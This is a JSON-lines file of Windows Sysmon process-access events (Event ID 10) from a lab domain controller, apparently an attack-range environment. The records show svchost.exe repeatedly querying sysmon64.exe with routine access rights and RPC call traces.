{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6223,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6224,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6225,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6226,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6227,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6228,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6229,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6230,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:44.053\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:44.053","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
